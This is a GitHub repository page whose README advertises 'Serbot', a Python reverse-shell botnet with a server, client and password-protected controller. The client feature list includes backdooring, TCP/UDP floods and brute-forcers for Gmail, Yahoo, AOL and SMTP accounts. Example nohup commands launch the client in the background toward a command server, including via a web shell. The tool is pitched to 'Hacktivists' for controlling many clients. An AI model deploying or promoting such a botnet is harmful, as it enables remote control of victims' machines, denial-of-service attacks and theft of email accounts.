Skip to content
Advanced Controller/Server/Client Reverse Shell/Bot – Windows/Linux – Python
Python
Branch: master
Clone or download
Latest commit 55a1983 Feb 21, 2016
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
LICENSE.md Updated Feb 18, 2015
README.md Minor typos. Feb 20, 2016
client.py Bug fixes Feb 18, 2015
controller.py
server.py Huge update Feb 18, 2015

README.md

Hello everyone,

alt tag alt tag

Serbot is hot, keep reading Lol.

So, lets just get to the point, I’ve showed you Awrs and what it’s capable of, considered as one of the best Reverse Shells I’ve decided to Update Awrs and create Serbot and no, it’s not what you think Lol.

Serbot is an advanced version of Awrs where the Server can be managed by 1 Controller at a time. ######Example: Server hosted on 15.48.158.15 and accepts up to 100 clients through port 1567, accepts 1 Controller at a time through port 2357 and the Controller’s functions are protected with a password: “IAmAPassword” Client 1 hosted on 86.58.157.25 connected to 15.48.158.15:1567 Client 2 hosted on 78.459.17.35 connected to 15.48.158.15:1567 Controller running on my own computer connected to the Server on 15.48.158.15:2357 using the valid password “IAmAPassword”

In Serbot’s case, the Server also plays the role of a Bridge between the Clients and the Controller. This should sum things up. There’s a lot of benefits out of this now that’s for sure. A team of Researches or Hacktivists can now interact with all their clients using their Controllers, they don’t have to worry about portforwading, reverse shell’s stability and speed etc and they’re all sharing everything they have control on in one place.

In Serbot, everything was dealt with, your Server will never crash nor will your Clients no matter what, check the features list below for more info:

#####Server:

  1. Linux/Windows Version.
  2. Multi Handler. Can handle multiple connections all at once.
  3. Bridge. Plays also the roll of a Bridge between the Clients and the Controller.
  4. The Controller’s connection requires a plain text password, it’s not the best but it’s more than enough when it comes to keeping “l337 hax0rz b0t tak30v3r” away.
  5. Accepts only 1 Controller at a time.
  6. Kicks the Controller after 5 mins. This was added just in case someone forgot his Controller on which won’t allow other controllers to connect (since the Server only accepts 1 controller at a time).
  7. Uses a very small amount of CPU and RAM when running.
  8. Fast and Stable.

#####Client:

  1. Linux Version.
  2. Backdooring Function. (For more info: https://github.com/dotcppfile/Serbot/releases/tag/18%2F2%2F2015)
  3. TCP Flood.
  4. UDP Flood.
  5. Gmail Bruteforcer. (Workaround gmail's SMTP login)
  6. Live Bruteforcer.
  7. Yahoo Bruteforcer.
  8. AOL Bruteforce.
  9. Custome SMTP Bruteforcer. (if found, the password will be saved in "password.txt" client-side)
  10. Self Update.
  11. You’ll never lose your shell. (No Output, Wrong, Interactive and Infinite commands won’t kill your shell)
  12. Can handle commands like: mkdir whatever; cd whatever.
  13. Never closes and is always trying to connect to the Server.
  14. Can handle any command properly, such as the cd command.
  15. Always gets back a response. (Command Output or Simple Client response)
  16. Uses a very small amount of CPU and RAM when running.
  17. Fast and Stable.

#####Controller:

  1. Linux/Windows Version.
  2. Handles all commands perfectly.
  3. Handles any stupidity (KeyboardInterrupts, empty commands, etc) perfectly.
  4. Uses a very small amount of CPU and RAM when running.
  5. Easy user interface.
  6. Fast and Stable.

This list isn’t enough but that’s all that I can think of right now. If you want to know how stable Serbot is then you have to try and code something similar to it Lol because then you’ll know that it handles everything you’re facing when it comes to bugs, errors, commands etc…

You simply have to remove the “#!/usr/bin/env python2″ at the top of every script to get this up and running on windows.

#####Extra: If you’re trying to activate the Client through ssl, shell or web shell then you have to run the client.py in another process in the background or else your shell will dive into an endless loop and the best way to do that in Linux would be using nohup.

######Example: nohup python client.py 15.48.158.15 1567 > /dev/null &

nohup python client.py 15.48.158.15 1567 > /dev/null 2>&1 &

Greetings to Team Prophetic, Chaoshackerz and all the followers of https://dotcppfile.wordpress.com/, That’s all, dotcppfile.

You can’t perform that action at this time.